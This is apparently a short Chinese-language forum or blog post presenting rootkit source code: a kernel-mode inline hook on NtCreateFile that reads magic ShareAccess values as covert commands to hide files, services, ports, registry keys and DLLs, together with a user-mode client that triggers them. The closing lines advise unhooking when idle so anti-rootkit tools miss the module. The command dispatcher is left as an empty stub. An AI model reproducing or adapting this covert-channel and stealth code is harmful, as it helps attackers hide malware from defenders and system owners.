Rootkit --逆向工程技術--

ring0代碼：

#define NO_MSG 0x88882048
#define START_PROTECT 0x88884086
#define START_HIDEFILE 0x88884087
#define START_HIDESERVICES 0x88884088
#define START_HIDEPORT 0x88884089
#define START_HIDEKEY 0x88884090
#define START_CHECKHOOK 0x88884091

#define START_PARAKEY   0x88884092
#define START_DLLPATH 0x88884093

#define START_CLEARFILER 0x88884094

#define START_HOOKIOCREATEFILE 0x88884095

#define START_HIDEDLL 0x88884096

VOID DispatchIoctl(ULONG IRPcode,WCHAR *buf,ULONG uInSize)
{
      //執行你的代碼~~！
}

#pragma LOCKEDCODE
NTSTATUS NewNtCreateFile(OUT PHANDLE FileHandle,
       IN ACCESS_MASK DesiredAccess,
       IN POBJECT_ATTRIBUTES ObjectAttributes,
       OUT PIO_STATUS_BLOCK IoStatusBlock,
       IN PLARGE_INTEGER AllocationSize OPTIONAL,
       IN ULONG FileAttributes,
       IN ULONG ShareAccess,
       IN ULONG CreateDisposition,
       IN ULONG CreateOptions,
       IN PVOID EaBuffer OPTIONAL,
       IN ULONG EaLength)
{
NTSTATUS status;
WCHAR lpwCommand[100];
BOOL hcheck = FALSE;

switch(ShareAccess)
{  
case START_PROTECT:
   hcheck = TRUE;
   break;

case START_HIDEFILE:
   hcheck = TRUE;
   break;

case START_HIDEKEY:
   hcheck = TRUE;
   break;

case START_HIDESERVICES:
   hcheck = TRUE;
   break;

case START_HIDEPORT:
   hcheck = TRUE;
   break;

case START_PARAKEY: //
   hcheck = TRUE;
   break;

case START_DLLPATH:
   hcheck = TRUE;
   break;

case START_CLEARFILER:
   hcheck = TRUE;
   break;

case START_CHECKHOOK:
   hcheck = TRUE;
   break;

case START_HOOKIOCREATEFILE:
   hcheck = TRUE;
   break;

case START_HIDEDLL:
   hcheck = TRUE;
   break;                         
}
if (hcheck == TRUE)

{

RtlZeroMemory(lpwCommand,100);
memcpy(lpwCommand,ObjectAttributes->ObjectName->Buffer,ObjectAttributes->ObjectName->Length);
DispatchIoctl(ShareAccess,lpwCommand,wcslen(lpwCommand));   //和驅動通信函數~~
hcheck = FALSE;
return FALSE;

}

OldNtCreateFile = (NtCreateFile)NtCreateFileHookZone;
status = OldNtCreateFile(FileHandle,
   DesiredAccess,
   ObjectAttributes,
   IoStatusBlock,
   AllocationSize,
   FileAttributes,
   ShareAccess,
   CreateDisposition,
   CreateOptions,
   EaBuffer,
   EaLength);
return status;
}

////////////////////////////////////////////

ring3代碼就很簡單了：

#include <windows.h>
#include <stdio.h>

#define NO_MSG 0x88882048
#define START_PROTECT 0x88884086
#define START_HIDEFILE 0x88884087
#define START_HIDESERVICES 0x88884088
#define START_HIDEPORT 0x88884089
#define START_HIDEKEY 0x88884090
#define START_CHECKHOOK 0x88884091
#define START_PARAKEY   0x88884092
#define START_DLLPATH 0x88884093
#define START_CLEARFILER 0x88884094
#define START_HOOKIOCREATEFILE 0x88884095
#define START_HIDEDLL 0x88884096

int main(int argc, char *argv[])
{
if (argc!=2)
{
   printf("used:%s lpk.dll\r\n",argv[0]);
   return 0;
}
HANDLE hFile = CreateFile(argv[1], GENERIC_READ, START_HIDEFILE ,NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
return TRUE;
}

這樣就不需要註冊Device，在隱藏內核模塊的時候，比較方便~~！不需要通信的時候，恢復inline hook免得被ARK工具掃出來~~

還有很多函數可以用，仁者見仁智者見智了~~